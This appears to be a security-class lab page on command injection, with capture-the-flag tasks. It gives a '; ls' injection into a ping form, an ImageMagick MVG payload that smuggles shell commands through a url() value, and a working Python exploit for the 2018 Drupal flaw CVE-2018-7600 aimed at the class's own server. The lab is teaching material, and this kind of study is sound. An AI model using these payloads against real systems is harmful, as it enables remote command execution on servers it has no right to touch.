A40: Command Injection (60 pts)

Ping Form (20 pts)

The form below lets you send pings to a remote host. Unfortunately, it has a vulnerability.

To use the form normally, enter a target, such as
To see the vulnerability, enter; ls
Target IP:    

Challenges: Find the Flags (20 pts)

There are four flags available on this server:

ImageMagick Vulnerability (20 pts)

Normal Usage

  1. Get a normal GIF or JPEG image
  2. Upload it using the buttons below
  3. Click the thumbnail to see your image
Select image to upload:


Make a text file with these contents:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com"|echo "HELLO";date;")'
pop graphic-context
Save it as exploit.jpg. Upload it using the form above on this page.

The "echo" and "date" commands execute, as shown below.

Challenges: Find the Flags (20 pts)

There are two flags available in the "chal2" folder:

Drupal Command Injection (20 pts)


In April, 2018, a critical Drupal vulnerability was announced, and exploit code became available, as detailed here:


In this project, you'll perform that attack.

Viewing the Vulnerable Website

In a browser, go to:


It's just a default installation of Drupal, as shown below.

Preparing the Attack

Using a text editor, such as nano or Notepad, create a file named dru.py containing this code. Change the filename YOURNAME to something unique in all three places it appears.
import sys
import requests

# Based on https://github.com/a2u/CVE-2018-7600 by Vitalii Rudnykh

target = "https://drupal.samsclass.info/"

url = target + 'user/register?element_parents=account/mail/' \
      + '%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 
           'mail[#post_render][]': 'exec', 'mail[#type]': 'markup',
           'mail[#markup]': 'echo ";-)" | tee YOURNAME.txt'}

r = requests.post(url, data=payload)

check = requests.get(target + 'YOURNAME.txt')
if check.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'YOURNAME.txt')

Running the Attack

In a Terminal or Command Prompt window, execute this command:
python dru.py
The attack succeeds, creating a file on the target server, as shown below.

Challenges: Find the Flags (20 pts)

There are two flags on this server:

Posted 4-21-19
ImageMagick & Drupal added 4-23-19